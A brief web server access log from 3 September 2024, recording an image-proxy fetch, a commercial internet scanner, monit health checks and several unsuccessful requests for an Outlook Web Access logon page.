64.233.173.2 - - [03/Sep/2024:07:09:37 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
198.235.24.126 - - [03/Sep/2024:07:10:14 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:07:11:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:07:13:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:07:15:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:07:15:44 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:07:15:44 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
178.211.139.188 - - [03/Sep/2024:07:16:56 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.95.49.158 - - [03/Sep/2024:07:17:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:07:17:08 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
